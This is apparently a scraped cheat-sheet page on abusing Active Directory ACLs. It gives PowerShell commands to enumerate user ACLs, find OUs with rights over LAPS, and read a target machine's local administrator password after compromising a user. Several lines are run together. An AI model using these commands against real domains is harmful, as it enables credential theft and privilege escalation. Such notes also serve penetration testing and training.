ACL Abuse
Enumeration
# Import
Import-Module C:\ADModule\Microsoft.ActiveDirectory.Management.dll
Import-Module C:\ADModule\ActiveDirectory\ActiveDirectory.psd1
# Get DistinguishedName
Get-ADUser -Identity USER
# Find ACLs related to that user
(Get-Acl 'AD:\CN=USER,CN=Users,DC=it,DC=gcb,DC=local').AccessFind-InterestingDomainACL -ResolveGUIDsInvoke-ACLScanner -ResolveGUIDsReadProperty, ExtendedRight over OU / Computer Object
# Import module
Import-Module C:\AD\Tools\AdmPwd.PS\AdmPwd.PS.psd1
# Find the OUs that can read LAPS passwords
Find-AdmPwdExtendedRights -Identity <OU>
# Once we have compromised a user that can read LAPS
Get-AdmPwdPassword -ComputerName <targetmachine>WriteProperty | Self-Membership | GenericAll over Group
GenericWrite | GenericAll | WriteProperty over Computer Object
GenericAll over User Object
WriteDACL over DC
Resources
Last updated